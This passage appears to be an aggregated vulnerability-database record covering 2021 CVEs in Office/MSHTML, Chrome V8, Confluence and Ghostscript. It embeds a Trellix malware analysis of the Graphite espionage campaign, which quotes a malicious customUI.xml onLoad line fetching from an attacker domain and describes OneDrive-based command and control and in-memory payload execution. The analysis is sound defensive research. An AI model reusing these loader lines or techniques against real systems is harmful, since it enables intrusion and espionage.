"https://ubuntu.com/security/CVE-2021-30632", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "trendmicroblog": [{"lastseen": "2021-09-25T08:36:17", "description": "Microsoft has disclosed the existence of a new zero-day vulnerability that affects multiple versions of Windows. This vulnerability (designated as CVE-2021-40444) is currently delivered via malicious Office 365 documents and requires user input to open the file to trigger.", "cvss3": {}, "published": "2021-09-09T00:00:00", "type": "trendmicroblog", "title": "Remote Code Execution 0-Day (CVE-2021-40444) Hits Windows, Triggered Via Office Docs", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-09T00:00:00", "id": "TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE", "href": "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-29T14:37:27", "description": "Trend Micro detected a new campaign using a recent version of the known FormBook infostealer. Newer FormBook variants used the recent Office 365 zero-day vulnerability, CVE-2021-40444.", "cvss3": {}, "published": "2021-09-29T00:00:00", "type": "trendmicroblog", "title": "FormBook Adds Latest Office 365 0-Day Vulnerability (CVE-2021-40444) to Its Arsenal", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-29T00:00:00", "id": "TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2", "href": "https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-21T16:35:19", "description": "Recently, we discovered that the cryptomining trojan z0Miner has been taking advantage of the Atlassian\u2019s Confluence remote code execution (RCE) vulnerability assigned as CVE-2021-26084, which was disclosed by Atlassian in August.", "cvss3": {}, "published": "2021-09-21T00:00:00", "type": "trendmicroblog", "title": "Cryptominer z0Miner Uses Newly Discovered Vulnerability CVE-2021-26084 to Its Advantage", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-21T00:00:00", "id": "TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "href": "https://www.trendmicro.com/en_us/research/21/i/cryptominer-z0miner-uses-newly-discovered-vulnerability-cve-2021.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2023-05-23T16:36:16", "description": "This package provides useful conversion utilities based on Ghostscript soft ware, for converting PS, PDF and other document formats between each other. Ghostscript is a suite of software providing an interpreter for Adobe Syste ms' PostScript (PS) and Portable Document Format (PDF) page description languag es. Its primary purpose includes displaying (rasterization & rendering) and pri nting of document pages, as well as conversions between different document format s. ", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-09-24T20:53:56", "type": "fedora", "title": "[SECURITY] Fedora 35 Update: ghostscript-9.54.0-4.fc35", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3781"], "modified": "2021-09-24T20:53:56", "id": "FEDORA:19E593090F0D", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/S6PXMW7SL7KWO3LGLS3AR2TT5HTP37CG/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T16:36:15", "description": "This package provides useful conversion utilities based on Ghostscript soft ware, for converting PS, PDF and other document formats between each other. Ghostscript is a suite of software providing an interpreter for Adobe Syste ms' PostScript (PS) and Portable Document Format (PDF) page description languag es. Its primary purpose includes displaying (rasterization & rendering) and pri nting of document pages, as well as conversions between different document format s. ", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-09-20T13:57:59", "type": "fedora", "title": "[SECURITY] Fedora 34 Update: ghostscript-9.54.0-2.1.fc34", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3781"], "modified": "2021-09-20T13:57:59", "id": "FEDORA:3A0B8309A62E", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/CUUU23H5AUDW3KBMY6WD4MQFZLMXYMIT/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T16:36:15", "description": "This package provides useful conversion utilities based on Ghostscript soft ware, for converting PS, PDF and other document formats between each other. Ghostscript is a suite of software providing an interpreter for Adobe Syste ms' PostScript (PS) and Portable Document Format (PDF) page description languag es. Its primary purpose includes displaying (rasterization & rendering) and pri nting of document pages, as well as conversions between different document format s. ", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-09-23T19:30:34", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: ghostscript-9.54.0-2.1.fc33", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3781"], "modified": "2021-09-23T19:30:34", "id": "FEDORA:1910130B132D", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/RXG6LIWK2D3GUM3ID433WGSNSE2OFO4W/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2023-05-23T16:39:53", "description": "## Releases\n\n * Ubuntu 21.04 \n * Ubuntu 20.04 LTS\n\n## Packages\n\n * ghostscript \\- PostScript and PDF interpreter\n\nIt was discovered that Ghostscript incorrectly handled certain PostScript \nfiles. If a user or automated system were tricked into processing a \nspecially crafted file, a remote attacker could possibly use this issue to \naccess arbitrary files, execute arbitrary code, or cause a denial of \nservice.\n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-09-10T00:00:00", "type": "ubuntu", "title": "Ghostscript vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3781"], "modified": "2021-09-10T00:00:00", "id": "USN-5075-1", "href": "https://ubuntu.com/security/notices/USN-5075-1", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2023-05-24T10:09:28", "description": "A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-16T19:15:00", "type": "debiancve", "title": "CVE-2021-3781", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3781"], "modified": "2022-02-16T19:15:00", "id": "DEBIANCVE:CVE-2021-3781", "href": "https://security-tracker.debian.org/tracker/CVE-2021-3781", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-19T15:19:16", "description": "Out of bounds write in V8 in Google Chrome prior to 93.0.4577.82 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-08T21:15:00", "type": "debiancve", "title": "CVE-2021-30632", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30632"], "modified": "2021-10-08T21:15:00", "id": "DEBIANCVE:CVE-2021-30632", "href": "https://security-tracker.debian.org/tracker/CVE-2021-30632", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2023-05-23T16:24:17", "description": "Trivial -dSAFER bypass in 9.55. (CVE-2021-3781) \n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-09-23T04:49:29", "type": "mageia", "title": "Updated ghostscript packages fix security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3781"], "modified": "2021-09-23T04:49:29", "id": "MGASA-2021-0436", "href": "https://advisories.mageia.org/MGASA-2021-0436.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-11-26T18:09:51", "description": "Microsoft has released mitigations and workarounds to address a remote code execution vulnerability (CVE-2021-40444) in Microsoft Windows. Exploitation of this vulnerability may allow a remote attacker to take control of an affected system. This vulnerability has been detected in exploits in the wild. \n\nCISA encourages users and administrators to review [Microsoft\u2019s advisory](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444 >) and to implement the mitigations and workarounds.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "cisa", "title": "Microsoft Releases Mitigations and Workarounds for CVE-2021-40444 ", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-07T00:00:00", "id": "CISA:C70D91615E3DC8B589B493118D474566", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:09:54", "description": "On August 25, 2021, Atlassian released security updates to address a remote code execution vulnerability (CVE-2021-26084) affecting Confluence Server and Data Center. Recently, CVE-2021-26084 has been detected in exploits in the wild. A remote attacker could exploit this vulnerability to take control of an affected system.\n\nCISA urges users and administrators to review [Atlassian Security Advisory 2021-08-25](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) and immediately apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-03T00:00:00", "type": "cisa", "title": "Atlassian Releases Security Updates for Confluence Server and Data Center", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-03T00:00:00", "id": "CISA:D7188D434879621A3A83E708590EAE42", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "trellix": [{"lastseen": "2022-01-25T00:00:00", "description": "# Prime Minister\u2019s Office Compromised: Details of Recent Espionage Campaign\n\nBy Marc Elias \u00b7 January 25, 2022\n\nA special thanks to Christiaan Beek, Alexandre Mundo, Leandro Velasco and Max Kersten for malware analysis and support during this investigation.\n\n#### Executive Summary\n\nOur Advanced Threat Research Team have identified a multi-stage espionage campaign targeting high-ranking government officials Western Asia and Eastern Europe. As we detail the technical components of this attack, we can confirm that we have undertaken pre-release disclosure to the victims and provided all necessary content required to remove all known attack components from their environments. \n\nThe infection chain starts with the execution of an Excel downloader, most likely sent to the victim via email, which exploits an MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-defender-blog-mshtml-cve-2021-40444/>)) to execute a malicious executable in memory. The attack uses a follow-up piece of malware called Graphite because it uses Microsoft\u2019s Graph API to leverage OneDrive as a command and control server\u2014a technique our team has not seen before. Furthermore, the attack was split into multiple stages to stay as hidden as possible. \n\nCommand and control functions used an Empire server that was prepared in July 2021, and the actual campaign was active from October to November 2021. The below blog will explain the inner workings, victimology, infrastructure and timeline of the attack and, of course, reveal the IOCs and MITRE ATT&CK techniques.\n\nA number of the attack indicators and apparent geopolitical objectives resemble those associated with the previously uncovered threat actor APT28. While we don\u2019t believe in attributing any campaign solely based on such evidence, we have a moderate level of confidence that our assumption is accurate. That said, we are supremely confident that we are dealing with a very skilled actor based on how infrastructure, malware coding and operation were setup.\n\nTrellix customers are protected by the different McAfee Enterprise and FireEye products that were provided with these indicators.\n\n#### Analysis of the Attack Process\n\nThis section provides an analysis of the overall process of the attack, beginning with the execution of an Excel file containing an exploit for the MSHTML remote code execution vulnerability ([CVE-2021-40444](<https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-defender-blog-mshtml-cve-2021-40444/>)) vulnerability. This is used to execute a malicious DLL file acting as a downloader for the third stage malware we called Graphite. Graphite is a newly discovered malware sample based on a OneDrive Empire Stager which leverages OneDrive accounts as a command and control server via the Microsoft Graph API. \n\nThe last phases of this multi-stage attack, which we believe is associated with an APT operation, includes the execution of different Empire stagers to finally download an Empire agent on victims\u2019 computers and engage the command and control server to remotely control the systems.\n\nThe following diagram shows the overall process of this attack.\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/pm-office-compromised1.png) **Figure 1. Attack flow**\n\n### First Stage \u2013 Excel Downloaders\n\nAs suggested, the first stage of the attack likely uses a spear phishing email to lure victims into opening an Excel file, which goes by the name \u201cparliament_rew.xlsx\u201d. Below you can see the identifying information for this file:\n\nFile type | Excel Microsoft Office Open XML Format document \n---|--- \nFile name | parliament_rew.xlsx \nFile size | 19.26 KB \nCompilation time | 05/10/2021 \nMD5 | 8e2f8c95b1919651fcac7293cb704c1c \nSHA-256 | f007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4 \n \n![](https://www.trellix.com/en-us/img/newsroom/stories/pm-office-compromised2.png) **Figure 2. Decoy text observed in the Excel file**\n\nIn analyzing this file\u2019s structure, we observed that it includes a folder named \u201ccustomUI\u201d that contains a file named \u201ccustomUI.xml\u201d. Opening this file with a text editor, we observed that the malicious document uses the \u201cCustomUI.OnLoad\u201d property of the OpenXML format to load an external file from a remote server: \n\n** <customUI xmlns**=\"http://schemas.microsoft.com/office/2006/01/customui\" onLoad='https://wordkeyvpload[.]net/keys/parliament_rew.xls!123'> </customUI>\n\nThis technique allows the attackers to bypass some antivirus scanning engines and office analysis tools, decreasing the chances of the documents being detected. \n\nThe downloaded file is again an Excel spreadsheet, but this time it is saved using the old Microsoft Office Excel 97-2003 Binary File Format (.xls). Below you can see the identifying information of the file:\n\nFile type | Microsoft Office Excel 97-2003 Binary File Format \n---|--- \nFile name | parliament_rew.xls \nFile size | 20.00 KB \nCompilation time | 05/10/2021 \nMD5 | abd182f7f7b36e9a1ea9ac210d1899df \nSHA-256 | 7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a \n \nAnalyzing the metadata objects, we can identify that the creator was using the codepage 1252 used in Western European countries and the file was created on October 5th, 2021.\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/pm-office-compromised3.png) **Figure 3. Document metadata**\n\nLater, we analyzed the OLE objects in the document and discovered a Linked Object OLEStream Structure which contains a link to the exploit of the CVE-2021-40444 vulnerability hosted in the attackers\u2019 server. This allows the document to automatically download the HTML file and subsequently call the Internet Explorer engine to interpret it, triggering the execution of the exploit.\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/pm-office-compromised4.png) **Figure 4. Remote link in OLE object**\n\nIn this blog post we won\u2019t examine the internals of the CVE-2021-40444 vulnerability as it has already been publicly explained and discussed. Instead, we will continue the analysis on the second stage DLL contained in the CAB file of the exploit.\n\n#### Second Stage \u2013 DLL Downloader\n\nThe second stage is a DLL executable named fontsubc.dll which was extracted from the CAB file used in the exploit mentioned before. You can see the identifying information of the file below:\n\nFile type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit \n---|--- \nFile name | fontsubc.dll \nFile size | 88.50 KB \nCompilation time | 28/09/2021 \nMD5 | 81de02d6e6fca8e16f2914ebd2176b78 \nSHA-256 | 1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40 \n \nThis file exports a function called \u201cCPlApplet\u201d that Windows recognizes as a control panel application. Primarily, this acts a downloader for the next stage malware which is located at hxxps://wordkeyvpload[.]net/keys/update[.]dat using COM Objects and the API \u201cURLOpenBlockingStreamW\u201d. \n\n![](https://www.trellix.com/en-us/img/newsroom/stories/pm-office-compromised5.png) **Figure 5. Download of next stage malware**\n\nAfter downloading the file, the malware will decrypt it with an embedded RSA Public Key and check its integrity calculating a SHA-256 of the decrypted payload. Lastly, the malware will allocate virtual memory, copy the payload to it and execute it.\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/pm-office-compromised6.png) **Figure 6. Payload decryption and execution**\n\nBefore executing the downloaded payload, the malware will compare the first four bytes with the magic value DE 47 AC 45 in hexadecimal; if they are different, it won\u2019t execute the payload.\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/pm-office-compromised7.png) **Figure 7. Malware magic value**\n\n#### Third Stage \u2013 Graphite Malware\n\nThe third stage is a DLL executable, never written to disk, named dfsvc.dll that we were able to extract from the memory of the previous stage. Below you can see the identifying information of the file:\n\nFile type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit \n---|--- \nFile name | dfsvc.dll \nFile size | 24.00 KB \nCompilation time | 20/09/2021 \nMD5 | 0ff09c344fc672880fdb03d429c7bda4 \nSHA-256 | f229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231 \n \nWe named this malware Graphite due to the use of the Microsoft Graph API to use OneDrive as command and control. It is very likely that the developers of Graphite used the Empire OneDrive Stager as a reference due to the similarities of the functionality and the file structure used in the OneDrive account of the actors.\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/pm-office-compromised8.png) **Figure 8. Empire OneDrive stager API requests**\n\nGraphite starts by creating a mutex with the hardcoded name \u201c250gHJAWUI289382s3h3Uasuh289di\u201d to avoid double executions, decrypt the strings and resolve dynamically the APIs it will use later. Moreover, it will calculate a bot identifier to identify the infected computer which is a CRC32 checksum of the value stored in the registry key \u201cHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\ Cryptography\\MachineGuid\u201d.\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/pm-office-compromised9.png) **Figure 9. Graphite initializations**\n\nNext, the malware will create a thread to monitor the execution of tasks and upload its results to the OneDrive account. Result files will be uploaded to the \u201cupdate\u201d folder of the attackers\u2019 OneDrive account. \n\n![](https://www.trellix.com/en-us/img/newsroom/stories/pm-office-compromised10.png) **Figure 10. Thread to monitor task results**\n\nAfter that, the malware will enter into an infinite loop where every 20 minutes it will obtain a new OAuth2 token to use with the Microsoft Graph API requests and determine if there are new tasks to execute in the \u201ccheck\u201d folder of the attackers\u2019 OneDrive account. \n\n![](https://www.trellix.com/en-us/img/newsroom/stories/pm-office-compromised11.png) **Figure 11. Request of new OAuth2 token**\n\nOnce it obtained a valid OAuth2 token, reconnaissance data is gathered containing the following information from the victims\u2019 systems:\n\n * Running processes\n * .NET CLR version from PowerShell\n * Windows OS version\n\nThe data is compressed using the LZNT1 algorithm and encrypted with a hardcoded AES-256-CBC key with a random IV. The operator tasks are encoded in the same way. Finally, the file containing the system information is uploaded to the folder \u201c{BOT_ID}/update\u201d in OneDrive with a random name.\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/pm-office-compromised12.png) **Figure 12. Graphite encoding data**\n\nGraphite will also query for new commands by enumerating the child files in the \"check\" subdirectory. If a new file is found, it will use the Graph API to download the content of the file and decrypt it. The decrypted tasks have two fields; the first one is a unique identifier of the task and the second one specifies the command to execute.\n\nThe command value \u201c1\u201d will instruct the malware to send the system information to the command and control again, which is the attackers\u2019 OneDrive. The command value \u201c2\u201d indicates that the decrypted task is a shellcode, and the malware will create a thread to execute it.\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/pm-office-compromised13.png) **Figure 13. Graphite commands**\n\nIf the received task is a shellcode, it will check the third field with the magic value DE 47 AC 45 in hexadecimal and, if they are different, it won\u2019t execute the payload. The rest of the bytes of the task is the shellcode that will be executed. Lastly, the task files are deleted from the OneDrive after being processed.\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/pm-office-compromised14.png) **Figure 14. Decrypted operator task**\n\nThe diagram below summarizes the flow of the Graphite malware.\n\n![](https://www.trellix.com/en-us/img/newsroom/stories/pm-office-compromised15.png) **Figure 15. Graphite execution diagram**\n\n#### Fourth Stage \u2013 Empire DLL Launcher Stager\n\nThe fourth stage is a dynamic library file named csiresources.dll that we were able to extract from a task from the previous stage. The file was embedded into a Graphite shellcode task used to reflectively load the executable into the memory of the process and execute it. Below you can see the identifying information of the file:\n\nFile type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit \n---|--- \nFile name | csiresources.dll \nFile size | 111.00 KB \nCompilation time | 21/09/2021 \nMD5 | 138122869fb47e3c1a0dfe66d4736f9b \nSHA-256 | 25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9 \n \nThe sample is a generated Empire DLL Launcher stager that will initialize and start the .NET CLR Runtime into an unmanaged process to execute a download-cradle to stage an Empire agent. With that, it is possible to run the Empire agent in a process that\u2019s not PowerShell.exe.\n\nFirst, the malware will check if the malware is executing from the explorer.exe process. If it is not, the malware will 